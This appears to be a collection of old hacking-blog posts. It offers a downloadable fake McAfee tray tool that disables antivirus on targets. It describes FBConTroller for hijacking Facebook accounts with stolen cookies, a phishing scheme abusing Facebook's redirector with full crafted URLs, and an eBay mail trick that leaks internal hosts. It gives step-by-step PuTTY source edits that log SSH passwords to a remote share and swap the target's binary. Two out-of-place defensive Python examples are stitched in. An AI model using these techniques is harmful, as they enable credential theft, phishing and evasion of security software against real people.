
Moving Towards Normality

Actions and Attempts towards Blue Sleep

Thanking Conficker


Can a computer worm ease your life? Save your time?
Yes it can, especially during Penetration Testing of an infected
network. It so happened that the target was a Domain Controller
with all patches updated, clean and sober.
But it was getting SMB requests from one system infected by
a member of the DOWNAD/Conficker worm family.
Thanks to Conficker's wordlist, after a while the DC too started
sending out SMB requests, trying to log in to other systems.
The MS08-067 patch was present and nobody was using the system, so the
conclusion matched the sniffer output: the Domain Controller had been
compromised through Conficker's password wordlist, with "admin" access.
This greatly reduced the time and effort required for manual
testing.

This incident is inspiring enough to make one want to edit Conficker, remove the
malicious payloads and turn it into a Network Crawler: release it
from Point A, ask it to hit Points B, C, D or any others, compromise
as many systems as it can and return to Point A bringing along the map
of traversed systems.

Time for OpenConficker ?

A worm saves your day !

One keeda can save you lots of Peeda
admin123


Fake McAfee Antivirus System Tray


Fake McAfee SysTray:

Many a time compromised Windows Desktops as well as Server Systems have well updated Windows Patches and active Antivirus software like Symantec, McAfee, etc. running on them. Under such situations it is very difficult to run Keyloggers, Hackwares, or any application whose signature is already present in the AV's Signature DB.

One workaround is to delete the virus definitions, but that is not very wise if you don't want to get detected.
Another workaround is to disable the AV via the System Tray for a temporary period of time.
This too is difficult at times, since direct interaction with the GUI is required to disable the AV, and even the slightest movement using the Target's Remote Screen access might raise an alert.

To solve this problem where McAfee Antiviruses are installed, here is a Fake McAfee Antivirus System Tray EXE.
Run this on your Target's system via Startup Folder or Registry or just directly using cmd access.

This Fake McAfee AV needs to be run as administrator or an almost equally powerful user on your target system.

This Fake McAfee AV does the following :

1 ] Stops McAfee services viz.

Mcafee MCShield
Mcafee Framework Service
Mcafee Task Manager

2 ] Kills McAfee System Tray Process : McTray.exe

3 ] Shows up in System Tray the same Icon used by real McTray.exe
(McAfee System tray)


This way the Target shouldn't notice a missing Systray ICON even when the AV Services have been disabled and the real Systray Process has been killed.
Now this unprotected window period can be used to run any Tool/utility previously detected/blocked by McAfee.

One .ico file and three exe files have been compiled by me and are available for download.
One of them requires mcafee.ico in the same folder as the exe.
The other one requires mcafee.ico to be in C:\WINDOWS\
The third one will auto-detect your WINDOWS folder (whichever drive it is on), but mcafee.ico should be planted there by you.
Use whichever you find most appropriate and easy to use.

Success rate : Good on McAfee AV for Desktops.

NOTE :
- Rename the Fake SysTray exe to McTray.exe so that the difference is unnoticed.
- A few McAfee installations might have different process names, service names and a different SysTray Icon. Test it on yourself before trying it on someone else.
- The author of this Fake McAfee AV holds no responsibility for whatever damage this FakeMcAfee SysTray causes to your Targets.
- This TooL is NOT SPYWARE, though I wouldn't be surprised if AV companies label it as such in their AV Databases. Fake McAfee SysTray doesn't attempt to delete or cause damage in any form; it only disables the protection offered by McAfee AV. The aftermath of this could be anything, depending on what software / malware is executed after that.
- Fake McAfee SysTray doesn't restore the stopped/killed processes. Fake McAfee SysTray doesn't infect other exe files or attempt to spread on its own.

Contact me if you require AV killers along with Fake AV Systrays for Symantec Endpoint, Avast, Comodo, AVG, etc.

Download : Fake_Silent_McAfee_SysTray from
http://solidmecca.co.nr [ Under Left Side of the Page/Tools]

Breaking FBConTroller, Unintentionally ?


Anyone who has successfully used FBConTroller version 1.0, or anybody who has looked into what a
Facebook Cookie looks like, would have seen a variable called xs.
Facebook has recently introduced a new variable called lxs whose sole aim (as observed by me till
date) is to hold a value of 1, and most of the time it shows up just before xs.
lxs=1;

This doesn't mean that Facebook is trying to break FBConTrolleR, but it could be true. Just not
so sure. But one thing is definitely evident:
this interferes with the working of FBConTroller and sometimes breaks down
its normal operation.
But how does the introduction of just 1 variable in the cookie have such a big adverse effect?
Answer: the reason is "Not-so-great" programming.
The code written by me doesn't search for the whole word xs in the cookie.txt but goes
letter by letter and checks for the appearance of the letter 's' after 'x'.

But there is a solution.
A counter will be added to increment 0 to 1 on seeing lxs
OR
After reaching xs, 3 more characters will be read from cookie.txt to check if it has "=1;"
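The defect above (a substring scan that takes the `xs` inside `lxs` for `xs`) beside a lookup that matches the cookie name as a whole token. This is an added example, not FBConTroller's own code; the cookie string is constructed, with the names xs, lxs and c_user taken from the post and the values made up.

```python
"""Cookie lookup by substring vs. by whole name.

Added example, not FBConTroller's own code. The cookie string is
constructed: the names xs, lxs and c_user come from the post, the values
are made up.
"""
from typing import Dict, Optional

# Constructed "Cookie:" header in the order the post describes: lxs=1 just before xs.
SAMPLE_COOKIE = "datr=abcdef; lxs=1; xs=12%3Adeadbeef%3A2; c_user=100000000001"


def naive_lookup(cookie: str, name: str) -> Optional[str]:
    """The defect described above: find the letters of `name` anywhere in
    the string and take whatever follows the next '=', so the 'xs' inside
    'lxs=1' wins and the value returned is '1'."""
    pos = cookie.find(name)          # substring match, no token boundary
    if pos < 0:
        return None
    eq = cookie.find("=", pos)
    if eq < 0:
        return None
    start = eq + 1
    end = cookie.find(";", start)
    return cookie[start:] if end < 0 else cookie[start:end]


def parse_cookie(cookie: str) -> Dict[str, str]:
    """Tokenise on ';', then split each pair on its first '=' so a name is
    only ever matched as a whole token. Values keep their percent-encoding."""
    jar: Dict[str, str] = {}
    for pair in cookie.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep and name:
            jar[name.strip()] = value.strip()
    return jar


def whole_name_lookup(cookie: str, name: str) -> Optional[str]:
    """Correct lookup: 'xs' and 'lxs' are different keys."""
    return parse_cookie(cookie).get(name)


if __name__ == "__main__":
    print("naive :", naive_lookup(SAMPLE_COOKIE, "xs"))        # 1  (wrong)
    print("parsed:", whole_name_lookup(SAMPLE_COOKIE, "xs"))   # 12%3Adeadbeef%3A2
```

The post's second proposed fix, reading three more characters after `xs` to look for `=1;`, only works as long as lxs keeps the value 1; tokenising removes that dependency.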

Harder the Battle, Sweeter The Victory
-- (Revolver)

ePukeMail ProcBay


eBay uses procmail (no disrespect, but it's a piece of software that is seldom updated by its author) and I
made an accidental discovery a few days back on Promotional Coupon and Offer Emails sent by eBay.

Just reply to a Promotional Email or an Email holding a Discount Coupon. Make sure to include the
Original Message in the Reply.
Though such Coupon Emails could be sent by eBay from any eBay Email address, the mail should be
sent only to "eBay Global EasyBuy" <eBay@reply.ebay.in>

You can remove from the Subject field the username which you have registered at eBay (it's
recommended to replace it with something else)

Make sure to Include this Text in the reply :


Dear Sir/Madam,

ABCDEFG. HIJKLMNOP.
QRSTUVW.XYZABCD.
123456789 :-(

password ?

Regards,
XX





Now after you hit send you will receive 2 Emails :


First :
From: reply@reply.ebay.in
Subject: Re: XX, Global EasyBuy Diwali offer: Assured free gifts & chance to win LCD TV &
Blackberry!
which is actually a Reply to the Email which you sent.


and

Second:
From:"Mail Delivery Subsystem" <MAILER-DAEMON@sjcitkcdmz08.sjc.ebay.com> [ Note that this ID is
subject to change ]
Subject: Returned mail: see transcript for details


Repeat the process and you will find Procmail (a mail filtering and categorising software) puke
out its log file along with eBay Inc.'s Singapore Servers' Internal IP addresses one by one, along with a full FQDN. This directly isn't a vulnerability, since Internal IPs can be obtained from mail headers as well, but mailing back a grepped log file isn't a very safe action, both for procmail as well as for eBay.

If you are lucky the Log file sent out by procmail might also include Subject Lines like :
1 ] Emails usernames of other eBay users
2 ] Nature of Coupons sent to them by eBay
3 ] Cancellation of accounts
4 ] Banning of users
etc.

Regardless of whether you see all the above or not, you will definitely see an error message like
this one in one of the mail's body content :

 ----- The following addresses had permanent fatal errors -----
"|IFS=' ' &&exec /usr/local/bin/procmail -f- || exit 75 #cm_user"
    (reason: can't create (user) output file)
    (expanded from: <cm_user@eresponse.vip.ebay.com>)

   ----- Transcript of session follows -----
550 5.0.0 "|IFS=' ' &&exec /usr/local/bin/procmail -f- || exit 75 #cm_user"... Can't create 
 output


And if you are lucky you might get a whole list like the one below :

So far these are the Internal IP addresses and Domain Names which I've gathered :

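A defender-side check for this kind of leak: before a bounce is released to an external sender, scan its transcript for "hostname [ip]" pairs in RFC 1918 space and for procmail delivery-pipe errors. This is an added example, not procmail's or eBay's code; the bounce text, hostnames and addresses below are constructed.

```python
"""Flag internal hostnames/addresses and delivery-pipe errors in a bounce.

Added example, not procmail's or eBay's code. The bounce below is
constructed; its "host [ip]" lines mimic the shape the post describes.
"""
import ipaddress
import re
from typing import List, Tuple

# Constructed bounce transcript: two relays on an RFC 1918 network, one
# public MX, and a procmail pipe failure like the one quoted in the post.
SAMPLE_BOUNCE = """\
   ----- Transcript of session follows -----
550 5.0.0 "|IFS=' ' &&exec /usr/local/bin/procmail -f- || exit 75 #cm_user"... Can't create output
procmail: Couldn't create "/var/log/procmail.log"
relay01-ext.mail.example.internal [10.0.12.34]
relay02.mail.example.internal [10.0.12.35]
mx.example.com [203.0.113.10]
"""

# Matches "hostname [dotted-quad]" as it appears in sendmail-style transcripts.
HOST_IP_RE = re.compile(r"([A-Za-z0-9.-]+)\s*\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Explicit RFC 1918 ranges rather than ipaddress.is_private, which also
# treats documentation ranges such as 203.0.113.0/24 as private.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip: str) -> bool:
    """True if ip lies in one of the RFC 1918 private ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # malformed quad such as 300.1.1.1
        return False
    return any(addr in net for net in RFC1918)


def find_host_ip_pairs(text: str) -> List[Tuple[str, str]]:
    """Every (hostname, ip) pair mentioned in the transcript."""
    return HOST_IP_RE.findall(text)


def leaked_internal_hosts(text: str) -> List[Tuple[str, str]]:
    """Pairs whose address is private: these name internal infrastructure."""
    return [(h, ip) for h, ip in find_host_ip_pairs(text) if is_rfc1918(ip)]


def pipe_errors(text: str) -> List[str]:
    """Lines showing that the local delivery pipe (procmail) failed; the
    post's leaked log file arrived in bounces carrying such lines."""
    return [ln.strip() for ln in text.splitlines()
            if ln.lstrip().startswith("procmail:") or "Can't create" in ln]


def bounce_is_safe(text: str) -> bool:
    """Hold the bounce if it would disclose internal hosts or pipe failures."""
    return not leaked_internal_hosts(text) and not pipe_errors(text)


if __name__ == "__main__":
    for host, ip in leaked_internal_hosts(SAMPLE_BOUNCE):
        print(f"internal host disclosed: {host} [{ip}]")
    for line in pipe_errors(SAMPLE_BOUNCE):
        print(f"delivery pipe error: {line}")
    print("safe to release:", bounce_is_safe(SAMPLE_BOUNCE))
```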

FBConTroller v2.0 - (Facebook Control Utility) version 2.0


FBController - The Ultimate Utility to Control Facebook accounts without the Password is now version 2.0

Let me make this clear again, like last time: this utility WON'T hack/crack Facebook accounts.
The utility needs biscuits/cookies instead of the password.

FBConTroller version 1.0 started with a simple requirement about which I scribbled something here in the past : http://my.opera.com/quakerdoomer/blog/2009/04/26/sharing-your-biscuits-unintenionally

And then it ultimately reached :
http://my.opera.com/quakerdoomer/blog/2009/05/07/looking-for-fbcontroller
and
http://my.opera.com/quakerdoomer/blog/fbcontroller-facebook-controller-the-ultimate-facebook-controller-without-the-pa



==========================
Changes in version 2.0
==========================

- You don't have to provide each and every cookie variable in the command parameter.
Just save your cookie into a file and point FB towards it.

- FBConTroller v2.0 has a menu based Operation making it easier to control.

- FBConTroller as of now can Write on one's own wall, other's wall, Retrieve Profile Page,
Retrieve Friends List and even attempts to Retrieve Inbox and Send Messages.

Many changes have taken place in the FB UI and the Cookie structure. The Detailed list about internal changes is available here :
http://my.opera.com/quakerdoomer/blog/2009/09/12/changes-in-facial-booxpressions

==============================================================

Download : http://solidmecca.co.nr [ Under Left Side of the Page/Tools]

Happy Controlling ! :-)

Changes in Facial Booxpressions


Changes in Face(Book)ial Expressions :

FBConTroller is Catching up with the frequent UI changes made by
Facebook in its display pages.

Listed below are a few changes (already implemented in v2.0) observed in the Facebook UI from Saturday, August 15, 2009 till today :

1 ] Status Update Page Changed to :
POST /ajax/updatestatus.php HTTP/1.1
from
POST /updatestatus.php HTTP/1.1


2 ] Lots of X don't appear anywhere anymore
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
and
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
have disappeared.

3 ] login_x has been deprecated by lxe

4 ] Introduced
lsd=xxxxxxxxxx
10-DIGIT-RANDOM-NUMBER-CONSTANT-PER-SESSION

5 ]
ref=name">
is gone from homepage.php

6 ] The variable s_vsn_facebookpoc_1 has gone from the Cookie.

7 ] In version 2.0 of FBConTRoller :
The search string is
class="fb_menu_link">
to check for Logged in user

8 ] Ajax content strings to display snippet, title(sender), message and messagetimestamp in the Front UI have been changed

Sender Name changed from
<td class=\"name_
to
\"title\":\"
OR
\"html\":\"

whichever one prefers to grep/find (but not a selectable choice in FBConTroller)

Message TimeStamp changed from
\"date\">
to
\"timeLastUpdatedRendered\":\"

Subject changed from
=\"subject_text
to
{\"subject\":\"

Inbox Snippet Text search text changed from
=\"snippet\">
to
\"snippet\":\"



This made me redo the whole Inbox Retrieval code according to the changes applied.
Though this sounds tedious, and yes it was, some of these changes have simplified the search code and have almost eliminated a few minor bugs.

After all not every change aims your mind to derange !

Strengthening falsehood using weak truths


Using Facebook to aid Facebook Phishing :

!! DESCRIBED below is just a Random Thought. Please do not try this from home !!

Imagine this Scenario :
1 ] You receive an email stating :
"We have observed that your Facebook was attacked to gain unauthorised access.
To avoid account locking please login to your account by clicking here."

2 ] Now this *here* URL is
http://www.facebook.com/l.php?u=http://www.facebook-scam-pages-whatever.com/---------------For%20the%20safety%20and%20privacy%20of%20your%20Facebook%20account,%20for%20this%20Session%20you%20will%20have%20to%20enter%20your%20password%20on%20the%20next%20Facebook%20web%20site%20page.%20You%20will%20now%20be%20redirected.%20Please%20click%20Continue



3 ] A little URL obfuscation, up to the allowed limit, can further help hide the obvious text, and of course, this being a proper Facebook-owned php redirector, none of your software phishing-scam detectors might warn you.
Also l.php echoes the whole URL. All that a phisher needs is a page named :
"---------------For the safety and privacy of your Facebook account, for this Session you will have to enter your password on the next Facebook web site page. You will now be redirected. Please click Continue"
on "http://www.facebook-scam-pages-whatever.com"

4 ] Care has been taken to echo the same warning back in the URL asking the user *"TO ENTER"* the password.

5 ] After the user visits "http://www.facebook-scam-pages-whatever.com" (which should be designed to look like a legit part owned by Facebook) and gives away his password, he/she/it can be sent back to:
http://www.login.facebook.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20!%20Congratulations%20You%20%20%20have%20successfully%20secured%20and%20protected%20your%20Facebook%20account%20%20%20Session.%20You%20will%20have%20to%20enter%20your%20password%20on%20the%20next%20Facebook%20web%20site%20page.%20You%20may%20now%20logon%20to



So as we see, gone are the days to host custom pages to lure people to reach a phishing page and to display a success message
2/3 steps in this attack was carried out using Facebook.com's hosted pages.

After all, human stupidity can be sometimes considered as a feature more than a bug !

Face-ing/Face-booking the Username Length Limitations

Congratulations to those who have 5 or more letters in their First name, because some of them can have their complete first name as their Facebook username.



Maybe the number of people in this world having string length of their First name < 5 is less than those with > 5.

The following was tried in order to force FB to register a 4-letter username :

STEP I : Analysing the internal Facebook Ajax code shows that the string length is checked client-side, without sending any packets. If it is < 5 you are asked then and there
to make it > 4

STEP II :
Check availability : [Purposely send a username > length of 4]
GET http://www.facebook.com/ajax/username/check.php?username=USRNM&nctr%5Bid%5D=ceb57f3a6d51432abd2a464e84bf6b6a&nctr%5Bct%5D=1245089012828 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.facebook.com/username/
x-svn-rev: 168745
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Proxy-Connection: Keep-Alive
Cookie: <YOUR-COOKIE-GOES-HERE>



STEP III :
POST http://un.facebook.com/ajax/username/grab.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.facebook.com/username/
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Proxy-Connection: Keep-Alive
Content-Length: 253
Host: un.facebook.com
Pragma: no-cache
Cookie: <YOUR-COOKIE-GOES-HERE>

username=(PUT-YOUR-4-OR-LESS-ALPHABET-USER-NAME-HERE)&nctr%5Bid%5D=3e9c57d8f8a6d51b8eb4295dc5503c1b&nctr%5Bct%5D=1245088669375&hash=a21198e36f473fc7e8bf999624aaf7cb&post_form_id=73bf272ea999e67826e5478ad123a435&post_form_id_source=dynamic_post&next=http%3A%2F%2Fwww.facebook.com%2Fusername%2F


I couldn't manage to get mine !! All that was received was :

HTTP/1.1 200 OK
Date: Mon, 15 Jun 2009 18:02:09 GMT
Server: Apache/1.3.41.fb2
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

bc 
<html><body><script>document.domain="facebook.com";window.parent.username_handle_error("Something went wrong. We're working on getting it fixed as soon as we can.");</script></body></html>
0




But there is one guy who actually managed to get this done.
Proof ?


Pseudo Loss for Gain - Opera 10.00 Beta


Have you recently upgraded from [WINDOWS] Opera 10.00 alpha to
Opera Version 10.00 Beta Build 1551 ?
If yes then, as expected after downloading the latest update, Opera would have asked you whether you want to restart the browser.

Opera closes itself properly, unlike killing the process using taskkill (which many of us do to get loads of our tabbed windows back)

Now on browser restart you won't be seeing any of your tabs back !
SHOCKED ? A simple Browser update made you lose your work ?
Saved tabs gone. Nothing remains.. Not even your Bookmarks.. Not even URL History !
Above this, Opera mocks you on its homepage and says "Reward yourself with Opera 10.00"

Very quickly, operadef6.ini was checked by me, which read :
[System]
Multi User=0   ; If enabled Opera will use Windows profiles to store individual user settings


Multi User was indeed set to 0, but Opera 10.00 beta still created Application Data\Opera\Opera 10 Preview and \Local Settings\Application Data\Opera\Opera 10 Preview
This also meant that Opera wasn't reading from the local folder.

The only change to be made to solve this is to locate :
operaprefs_default.ini and make the following change
[User Prefs]
Language File=D:\Program Files\Opera 10 Preview\locale\en\en.lng
[System]
Multi User=0   ; If enabled Opera will use Windows profiles to store individual user settings


You will get all tabs, windows, bookmarks and history back. (Ignore the Language File path.. Leave it the way it is in your ini file)
OPERA RULZ !!

PUTTKyeak


PUTTKyeak = PUTTY + KEYLOG + TWEAK

Nothing fancy, nothing great.
Described below is a small putty source code hack which will ask putty to log all SSH packet data by default into a file and ask putty not to ignore passwords. Hence, the log output file will include full credentials (usernames and passwords)

Before we begin : Download the PuTTY source code, here in this case for Windows : putty-src.zip

STEP I :
In putty.h we see the following
#define LGXF_OVR  1       /* existing logfile overwrite */
#define LGXF_APN  0       /* existing logfile append */
#define LGXF_ASK -1       /* existing logfile ask */
#define LGTYP_NONE  0       /* logmode: no logging */
#define LGTYP_ASCII 1       /* logmode: pure ascii */
#define LGTYP_DEBUG 2       /* logmode: all chars of traffic */
#define LGTYP_PACKETS 3       /* logmode: SSH data packets */
#define LGTYP_SSHRAW 4       /* logmode: SSH raw data */

Change the LGXF_OVR and LGXF_APN to :
#define LGXF_OVR  1       /* existing logfile overwrite */
#define LGXF_APN  0       /* existing logfile append */


STEP II :
In WINDOW.C we see
cfg.logtype = LGTYP_NONE;

do_defaults(NULL, &cfg);

CHANGE it to :
cfg.logtype = LGTYP_PACKETS;

do_defaults(NULL, &cfg);


Step III :
Furthermore you can go ahead and edit the LOGGING.C file and locate this section :
event = dupprintf("%s session log (%s mode) to file: %s",
      (mode == 0 ? "Disabled writing" :
                       mode == 1 ? "Appending" : "Writing new"),
      (ctx->cfg.logtype == LGTYP_ASCII ? "ASCII" :
       ctx->cfg.logtype == LGTYP_DEBUG ? "raw" :
       ctx->cfg.logtype == LGTYP_PACKETS ? "SSH packets" :
       ctx->cfg.logtype == LGTYP_SSHRAW ? "SSH raw data" :
       "unknown"),
      filename_to_str(&ctx->currlogfilename));

Change the cfg.logtype to LGTYP_PACKETS in all 4 lines and then no matter what logging mode is selected, putty.exe will always perform a SSH packet logging alongwith the password.


Step IV :
You can go one more step ahead and hardcode the logging filename (cfg.logfilename).


Step V :
As observed in ssh.c
{
    if (ssh->cfg.logomitpass)
        pkt->logmode = blanktype;
}

Let this be unchanged, locate SETTINGS.C

Change From :
    gppi(sesskey, "SSHLogOmitPasswords", 1, &cfg->logomitpass);

Change To :
    gppi(sesskey, "SSHLogOmitPasswords", 0, &cfg->logomitpass);


Step VI :
Compile the source and create a new putty.exe


There are other methods to achieve the same using something called PuttyHijacker, but that would involve Process Injection and a few other things. The advantage of replacing the putty.exe application is that you don't have to wait and monitor your target. Map a remote drive (of a system under your control) using NetBIOS and give that path in the Logging filename.
The disadvantage of replacing your target's putty.exe is that paranoid HIDS modules will prompt "Application changed" warnings. You will need to register the new putty.exe to handle this accordingly before replacing the original putty.exe with the hacked one.

Another, easier way to do this is to edit the settings inside the Saved Sessions (but that is again limited to cases where there is a Session Saved).
